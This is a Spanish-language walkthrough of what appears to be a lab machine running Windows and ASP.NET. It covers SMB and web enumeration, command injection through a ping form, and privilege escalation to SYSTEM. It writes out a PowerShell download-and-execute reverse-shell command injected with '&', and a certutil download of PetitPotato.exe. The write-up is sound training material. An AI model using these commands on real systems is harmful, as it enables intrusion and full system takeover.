Maquina Windows (ASP.NET)
Se logra identificar el servicio SMB, RDP y HTTP.
Acceso a Recursos Compartidos:
Para descargar podriamos utilizar algo similar a:
smb: \> get backup.json
La pagina contiene:
Como sabemos que este sitio web trabaja con ASP, le enviamos un descubrimiento de archivos con la extension de ASPX utilizando el parรกmetro:
dirb http://44.195.210.219/ -X .aspx 
Se lograron detectar dos ficheros con extensiรณn .aspx.
Asรญ que lo ideal seria revisar cada uno de estos ficheros desde en el navegador web.
El primero archivo nos entrega una divulgaciรณn de informaciรณn sensible por medio de un manejo inadecuado de errores.
Este error se provoca debido a un intento fallido de conexiรณn con una base de datos de SQLSERVER.
Ahora ingresamos al directorio test:
Inyecciรณn de comandos en formulario web
La inyecciรณn de comandos en aplicativos web es una vulnerabilidad crรญtica que ocurre cuando una aplicaciรณn web permite que un atacante inyecte y ejecute comandos arbitrarios en el sistema operativo subyacente. Este tipo de ataque surge debido a una insuficiente validaciรณn o sanitizaciรณn de los datos que la aplicaciรณn recibe, permitiendo que los usuarios maliciosos inyecten comandos del sistema operativo (OS) a travรฉs de formularios, URLs o cualquier punto de entrada de datos. Este tipo de vulnerabilidad se encuentra principalmente en aplicaciones web que ejecutan comandos del sistema como parte de su funcionalidad, ya sea para interactuar con archivos, servicios del sistema o realizar tareas administrativas.
ยฟCรณmo surge una inyecciรณn de comandos?
Una inyecciรณn de comandos ocurre cuando la aplicaciรณn web toma los datos proporcionados por el usuario (inputs) y los pasa directamente a un intรฉrprete de comandos del sistema operativo sin realizar una sanitizaciรณn adecuada o sin implementar medidas de seguridad como el uso de funciones especรญficas que eviten la ejecuciรณn directa de comandos arbitrarios. Este problema generalmente surge en aplicaciones que interactรบan con el sistema operativo a travรฉs de funciones como system(), exec(), popen(), o equivalentes en otros lenguajes de programaciรณn.
Vamos a snifear el trafico ICMP con TCPDUMP desde el servidor de WordPress y enviamos el ping desde el portal de ASPX hacia la ip privada del equipo de WordPress:
En la evidencia previa, se puede apreciar la recepciรณn exitosa del trafico ICMP desde la IP 172.16.1.10 hacia la IP 172.16.1.12
En las auditorias webs, siempre es recomendable revisar el cรณdigo fuente de la aplicaciรณn web:
El Cรณdigo fuente de la aplicaciรณn es el siguiente:
Vamos a intentar realizar una inyecciรณn de comandos sobre el servidor por medio del carรกcter especial: &
Logramos apreciar que esta aplicaciรณn es vulnerable a la inyecciรณn de comandos por medio del &
En este punto podemos ejecutar varios comandos para enumerar el sistema afectado:
Migracion de WebShell hacia RevShell utilizando PowerShell
Los APT suelen almacenar sus reverse Shell o virus en plataformas digitales clasificadas como seguras y de esta manera evitar la detecciรณn por parte de los blue team; ya que el trรกfico saliente estarรญa apuntando hacia recursos conocidos como confiables.
Y posteriormente, ejecutamos el siguiente comando sobre el formulario web vulnerable:
&powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://172.16.1.12/wordpress/PowerCPPJ.ps1')"
Antes de la ejecuciรณn, vamos a iniciar una escucha con Netcat teniendo en cuenta lo alojado en la Shell inversa que se encuentra en GitHub.
Ya entramos al windows....
Escalacion de privilegios en Windows usando SeImpersonatePrivilege
whoami /priv
Utilizamos LOLBAS para descargar el siguiente binario:
certutil -urlcache -f https://github.com/wh0amitz/PetitPotato/releases/download/v1.0.0/PetitPotato.exe C:\Users\Public\PetitPotato.exe
Y luego ejecutamos el siguiente comando:
C:\Users\Public\PetitPotato.exe 3 "whoami"
El retorno de este comando sera igual a:
NT AUTHORITY\SYSTEM
Last updated